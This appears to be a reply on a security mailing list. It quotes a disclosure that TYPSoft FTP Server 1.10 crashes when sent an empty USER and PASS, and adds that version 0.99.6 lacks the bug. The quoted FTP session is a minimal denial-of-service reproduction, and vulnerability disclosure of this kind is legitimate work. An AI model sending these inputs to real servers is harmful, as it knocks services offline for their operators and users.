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Re: TYPSoft FTP Server 1.10 may be crashed

The "TYPSoft FTP Server 0.99.6" has not this bug.

ib> Application:  TYPSoft FTP Server
ib>               http://www.typsoft.com
ib> Version:      1.10
ib> Bug:          Denial Of Service

ib> TYPSoft FTP Server may be crashed with empty USERNAME. 
ib> -----------------------------------------------------------------------
ib> 220 TYPSoft FTP Server 1.10 ready...
ib> USER
ib> 331 Password required for .
ib> PASS
ib> 501 Access violation at address 77F526AB in module 'ntdll.dll'. 
ib> Write of address 00404C4D
ib> -----------------------------------------------------------------------
ib> and the ftp server may be crashed.